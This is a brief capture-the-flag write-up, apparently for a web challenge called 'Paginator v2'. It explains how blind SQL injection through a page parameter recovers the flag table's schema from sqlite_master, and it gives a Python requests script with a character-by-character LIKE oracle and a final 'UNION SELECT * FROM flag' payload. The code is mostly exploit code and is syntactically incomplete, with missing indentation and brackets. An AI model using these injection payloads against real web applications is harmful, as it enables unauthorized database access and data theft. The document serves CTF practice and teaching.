
Use blind SQL injection to determine the table name, table schema. Then, becuase there are only 2 fields in `flag` table, use `UNION SELECT * FROM flag` to get the flag.

import requests
import string

URL = ""

s = requests.session()

def query(q: str,s):
x = f"2 AND {q}"

r = s.get(URL, params={
"p": "2," + x
return "Page 2" in r.text

# known = ""
# while True:
# for c in string.printable:
# # cur = (known + c).replace("_", "\\_").replace("%", "\\%")
# cur = (known + c)
# if query(f"(SELECT count(*) FROM sqlite_master WHERE tbl_name ='flag' AND sql LIKE '{cur}%')>0", s):
# print(cur)
# known = known + c
# break

r = s.get(URL, params={
"p": "2,2 UNION SELECT * FROM flag"

Original writeup (https://hackmd.io/@Jm6TApV6RIqYGkPXof9GJA/BkNKejftkl#Paginator-v2).